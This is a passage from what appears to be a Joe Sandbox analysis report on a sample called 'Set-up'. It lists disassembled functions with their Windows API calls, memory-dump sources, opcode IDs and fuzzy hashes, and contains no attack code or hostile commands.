                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast
                                                                                                                                  • String ID: !af_$datavect<unsigned char>::begin$datavect<unsigned char>::empty
                                                                                                                                  • API String ID: 1452528299-3321375171
                                                                                                                                  • Opcode ID: a45b5f5a27817f31080a93015ecf9602a80742e3975a8ffa1c0944c546ecac89
                                                                                                                                  • Instruction ID: c98037a3016eaae7c73253ecbf4e2080e2c2c0dd5706f11e16b68a807fa44468
                                                                                                                                  • Opcode Fuzzy Hash: a45b5f5a27817f31080a93015ecf9602a80742e3975a8ffa1c0944c546ecac89
                                                                                                                                  • Instruction Fuzzy Hash: E6919171A00205DFDB14EFA4DC95FAEB7F4EF14308F105528E905BB292EB34A959CBA1
                                                                                                                                  Function 00E5C290 Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 230COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast
                                                                                                                                  • String ID: !af_$datavect<unsigned char>::empty$datavect<unsigned char>::size
                                                                                                                                  • API String ID: 1452528299-2998150203
                                                                                                                                  • Opcode ID: d79f4513934213d4d08ceb5dfcc04d89ec3df6ab4e1acd6a435e47218096cfc2
                                                                                                                                  • Instruction ID: 636727693f44e5860c4ea8c42a6ecd8b1f96656338fe6e0a31517ad0e08aa2df
                                                                                                                                  • Opcode Fuzzy Hash: d79f4513934213d4d08ceb5dfcc04d89ec3df6ab4e1acd6a435e47218096cfc2
                                                                                                                                  • Instruction Fuzzy Hash: 81811770A00308DFDB14EF64DC55BAEBBF4EF11319F249959E805BB281E774A909CB91
                                                                                                                                  Function 00E5A951 Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 205COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00E5A720: LocalAlloc.KERNEL32(00000040,00000014), ref: 00E5A731
                                                                                                                                    • Part of subcall function 00E5A720: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00E5A740
                                                                                                                                  • LocalFree.KERNEL32(?,460C02D8), ref: 00E5AB3A
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Local$AllocDescriptorFreeInitializeSecurity
                                                                                                                                  • String ID: !af_$datavect<struct _EXPLICIT_ACCESS_W>::begin$datavect<unsigned char>::size
                                                                                                                                  • API String ID: 4091588403-1336233802
                                                                                                                                  • Opcode ID: 8765276abe6f0b5abf387f9cb6aeebf18ceee6b489642cc216f772a012292c0a
                                                                                                                                  • Instruction ID: 7b9c6a27b5c32a4b26427d7ca1d1e1d0e9247d37420860dc3154bd383a8ad5ac
                                                                                                                                  • Opcode Fuzzy Hash: 8765276abe6f0b5abf387f9cb6aeebf18ceee6b489642cc216f772a012292c0a
                                                                                                                                  • Instruction Fuzzy Hash: 51719171900244DFDB25DFA8C945BAEBBF8BB04715F1846B9EC15B7281D7709E08CBA2
                                                                                                                                  Function 00E625C6 Relevance: 6.2, APIs: 4, Instructions: 150COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 00E6267F
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 00E626BA
                                                                                                                                  • GetConsoleScreenBufferInfo.KERNEL32(?,?,?,?,?), ref: 00E626F8
                                                                                                                                  • LeaveCriticalSection.KERNEL32(0131B8F8,?), ref: 00E62771
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Concurrency::cancel_current_task$BufferConsoleCriticalInfoLeaveScreenSection
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2158363688-0
                                                                                                                                  • Opcode ID: 43e0825da9aa2464f71d2fe999ce479d52ee2e1072462f1f239747657aa79af4
                                                                                                                                  • Instruction ID: 1ef109ac314b51b6741f24c93f4c15be1e500def4bcdf735ed167d21b98edbac
                                                                                                                                  • Opcode Fuzzy Hash: 43e0825da9aa2464f71d2fe999ce479d52ee2e1072462f1f239747657aa79af4
                                                                                                                                  • Instruction Fuzzy Hash: 3F51F430A44A098FDF28DB60E898BBDB7B5EF103A4F14652DD522FB1D4EB30A984C751
                                                                                                                                  Function 00E49DE0 Relevance: 6.1, APIs: 4, Instructions: 100COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SetLastError.KERNEL32(000000EA,?,0131B724,00000000,?,?,00E4769F,00E3A936,00000000,00000000,?), ref: 00E49E34
                                                                                                                                    • Part of subcall function 00E4A030: Concurrency::cancel_current_task.LIBCPMT ref: 00E4A3BA
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Concurrency::cancel_current_taskErrorLast
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 523316592-0
                                                                                                                                  • Opcode ID: fb67901062c4a72ae3ee8b88e8bd7c45a881f6f7368feb2c04526b8f9e81c87b
                                                                                                                                  • Instruction ID: a12f7cde01af9cf1d75427c7efc387b1020c218e4ccf4a70f030a03a6937ed53
                                                                                                                                  • Opcode Fuzzy Hash: fb67901062c4a72ae3ee8b88e8bd7c45a881f6f7368feb2c04526b8f9e81c87b
                                                                                                                                  • Instruction Fuzzy Hash: 7321F13234020467EF249EA5FC86BABB3D8EB89361F101165FE18FA1C1DA31A85197A1
                                                                                                                                  Function 01122DDD Relevance: 6.1, APIs: 4, Instructions: 64COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • ___initconin.LIBCMT ref: 01122E0E
                                                                                                                                  • GetConsoleMode.KERNEL32(FFFFFFFE,?,012FF458,00000030,01122DB8,012FF438,0000000C), ref: 01122E25
                                                                                                                                  • SetConsoleMode.KERNEL32(FFFFFFFE,00000000), ref: 01122E2F
                                                                                                                                  • ReadConsoleInputA.KERNEL32(FFFFFFFE,?,00000001,?), ref: 01122E46
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Console$Mode$InputRead___initconin
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1944608451-0
                                                                                                                                  • Opcode ID: b3a6fae4a50d916f4d4c9954f9a9958f39123090e589eb401eac26ff308defd4
                                                                                                                                  • Instruction ID: 924c609c7bd260ab775de786f1199cfe0c24fe8d4267cd0be3d6a4e01ee73d80
                                                                                                                                  • Opcode Fuzzy Hash: b3a6fae4a50d916f4d4c9954f9a9958f39123090e589eb401eac26ff308defd4
                                                                                                                                  • Instruction Fuzzy Hash: 2321E471C00274EFDB399FA8D8946FD7BB9BB05310F44022AE590A72C0D7349945EB21
                                                                                                                                  Function 00E84270 Relevance: 6.1, APIs: 4, Instructions: 62COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E842B1
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E842C9
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E842E1
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E842F9
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Exception@8Throw
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2005118841-0
                                                                                                                                  • Opcode ID: ea2c044f6bfb2e4a03e30d1fb4634255bf87cf31f8443d5fb1a189aa3e88a16e
                                                                                                                                  • Instruction ID: 48926979c9b7d71678d1f4fd2646eeed8256b9b07b1a36232f5d3e15800d3ac3
                                                                                                                                  • Opcode Fuzzy Hash: ea2c044f6bfb2e4a03e30d1fb4634255bf87cf31f8443d5fb1a189aa3e88a16e
                                                                                                                                  • Instruction Fuzzy Hash: 3711277150834A7AC605F6B4DC19D99BBE8EF51708F00886CF60C631E1EB71EA01C39A
                                                                                                                                  Function 00E66040 Relevance: 6.1, APIs: 4, Instructions: 58threadCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • EnterCriticalSection.KERNEL32(0131BE48,460C02D8), ref: 00E66077
                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00E66088
                                                                                                                                  • new.LIBCMT ref: 00E660A5
                                                                                                                                    • Part of subcall function 00E675E0: EnterCriticalSection.KERNEL32(0131BE48,460C02D8,?), ref: 00E67618
                                                                                                                                    • Part of subcall function 00E675E0: GetCurrentThreadId.KERNEL32 ref: 00E67629
                                                                                                                                    • Part of subcall function 00E675E0: __CxxThrowException@8.LIBVCRUNTIME ref: 00E67653
                                                                                                                                    • Part of subcall function 00E675E0: LeaveCriticalSection.KERNEL32(0131BE48), ref: 00E67664
                                                                                                                                  • LeaveCriticalSection.KERNEL32(0131BE48), ref: 00E66117
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalSection$CurrentEnterLeaveThread$Exception@8Throw
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2065089518-0
                                                                                                                                  • Opcode ID: 20c83404422e0820cd2efb834be6b20bb4f263cb3092071acd4f7aafa5d76501
                                                                                                                                  • Instruction ID: e96318e1d1cdbb1be60c317d37e3be165efe5f642c15bf22f52d42bd4638402c
                                                                                                                                  • Opcode Fuzzy Hash: 20c83404422e0820cd2efb834be6b20bb4f263cb3092071acd4f7aafa5d76501
                                                                                                                                  • Instruction Fuzzy Hash: C0210571806289EFD725DFA8E51978DFFF8EF05318F1041AAD424A7385D7B51608CBA2
                                                                                                                                  Function 00E704C0 Relevance: 6.1, APIs: 4, Instructions: 58threadCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • EnterCriticalSection.KERNEL32(0131BE48,460C02D8), ref: 00E704F7
                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00E70508
                                                                                                                                  • new.LIBCMT ref: 00E70522
                                                                                                                                    • Part of subcall function 00E709C0: EnterCriticalSection.KERNEL32(0131BE48,460C02D8), ref: 00E709F8
                                                                                                                                    • Part of subcall function 00E709C0: GetCurrentThreadId.KERNEL32 ref: 00E70A09
                                                                                                                                    • Part of subcall function 00E709C0: __CxxThrowException@8.LIBVCRUNTIME ref: 00E70A33
                                                                                                                                    • Part of subcall function 00E709C0: LeaveCriticalSection.KERNEL32(0131BE48), ref: 00E70A44
                                                                                                                                  • LeaveCriticalSection.KERNEL32(0131BE48), ref: 00E7058E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalSection$CurrentEnterLeaveThread$Exception@8Throw
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2065089518-0
                                                                                                                                  • Opcode ID: 43737f43dadcb31c5815e0712bbcb4480e02833bd85ec095487436f3e348630c
                                                                                                                                  • Instruction ID: 969289578ee3f122141923fd72c2917c4aab2ed9a5171fd44ed83da5eb036b78
                                                                                                                                  • Opcode Fuzzy Hash: 43737f43dadcb31c5815e0712bbcb4480e02833bd85ec095487436f3e348630c
                                                                                                                                  • Instruction Fuzzy Hash: 7F210170806289DFD725DFA8D65878DFFF8EF11318F10119AD418A7385C3B51608CBA2
                                                                                                                                  Function 00E5C710 Relevance: 6.1, APIs: 4, Instructions: 58threadCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • EnterCriticalSection.KERNEL32(0131BE48,460C02D8), ref: 00E5C747
